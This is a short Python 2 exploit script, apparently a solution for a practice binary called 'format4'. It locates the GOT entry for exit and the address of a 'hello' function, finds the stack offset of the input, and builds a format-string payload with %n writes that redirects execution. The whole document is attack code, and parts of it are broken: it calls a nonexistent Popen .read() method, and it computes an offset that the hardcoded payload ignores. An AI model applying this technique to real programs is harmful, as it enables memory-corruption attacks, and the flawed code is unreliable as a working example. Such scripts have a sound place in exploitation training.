test

import os, sys, struct
from subprocess import Popen, PIPE, STDOUT

target = os.popen("""objdump -R ./format4 | grep " exit" | awk '{print $1}'""").read()
target = target.strip()
target = int(target, 16)
print "[ 0x%08x ]" % target

branch = os.popen("""objdump -t ./format4 | grep " hello" | awk '{print $1}'""").read()
branch = branch.strip()
branch = int(branch, 16)
print "[ 0x%08x ]" % branch

command = """echo 'AAAAAAAA%s' | ./format4""" % ("%x "*15)
offset = os.popen(command).read()
offset = offset.strip().split().index('41414141') + 1
print "[", offset, "]"

de = (branch & 0xff000000) >> 24
ad = (branch & 0x00ff0000) >> 16
be = (branch & 0x0000ff00) >> 8
ef = (branch & 0x000000ff)
print "[ 0x%08x 0x%08x 0x%08x 0x%08x ]" % (de,ad,be,ef)

s1 = ef - 0x10
s2 = be - ef
if (s2 < 8): s2 = (be+0x100) - ef
s3 = ad - be
if (s3 < 8): s3 = (ad+0x100) - be
s4 = de - ad
if (s4 < 8): s4 = (de+0x100) - ad
print s1, s2, s3, s4

def pack(target):
    return ''.join( [ "\\x%02x" % ord( x ) for x in struct.pack("I", target) ] ).strip()

payload = ""
payload += pack(target)
payload += pack(target+0x01)
payload += pack(target+0x02)
payload += pack(target+0x03)
payload += "%{}x%4$n%{}x%5$n%{}x%6$n%{}x%7$n".format(s1, s2, s3, s4)

## THIS IS SOME UNSATISFACTORY SHIT RIGHT HERE
command = """python -c 'print "{}"' | ./format4""".format(payload)
result = Popen(command, shell=True).read()